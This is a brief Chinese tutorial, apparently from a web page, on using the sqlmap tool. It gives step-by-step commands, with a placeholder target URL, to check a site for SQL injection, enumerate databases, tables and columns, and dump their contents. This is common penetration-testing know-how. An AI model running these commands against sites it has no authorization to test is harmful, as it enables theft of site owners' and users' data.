使用
下载sqlmap后,通过命令行cd到sqlmap地址下,打开sqlmap.py(python版本要在2.7以内)
基本语句
1.判断某网址是否可注入:
sqlmap.py -u "要测试的地址"
2.当出现下图所示说明其发现id是可注入的,是否还需要测试其他参数是否可注入(例如url后面是id=1&user=aaa),此时如果选否,则直接进行注入判断,选是则会判断user是否可注入
3.当确认可以注入时判断数据库:
sqlmap.py -u "要测试的地址" --dbs
4.如果只有一个数据库之类时,则可能上面的语句无效,这时可以直接查表名:
sqlmap.py -u "要测试的地址" --tables
5.如果查到数据库,要查数据库下相关表名:
sqlmap.py -u "要测试的地址" -D [指定数据库名] --tables
6.获取列名:
sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] --columns
7.获取数据名:
sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] -C [指定列,如果多个用引号包起来,里面用逗号隔开] --dump
8.注:以上直接--tables、--columns、--dump不指定其他的话将会去获取所有的数据,例如直接地址后面--dump,则当前数据库内所有表名、列名、数据都会获取
网友评论